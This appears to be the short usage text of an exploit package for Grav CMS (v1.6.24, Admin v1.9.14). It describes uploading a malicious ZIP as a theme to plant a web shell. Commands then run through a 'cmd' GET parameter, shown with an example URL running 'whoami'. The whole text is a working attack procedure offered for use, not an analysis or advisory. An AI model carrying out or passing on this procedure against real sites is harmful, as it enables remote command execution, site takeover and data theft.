Malicious Zip to achieve RCE on Grav CMS if authenticated. Tested on Grav CMS v1.6.24 - Admin v1.9.14 Usage: Download ZIP Log in to the CMS Go to themes Upload new theme Add "cmd" get parameter for command execution. http://localhost/grav/grav-admin/admin/themes?cmd=whoami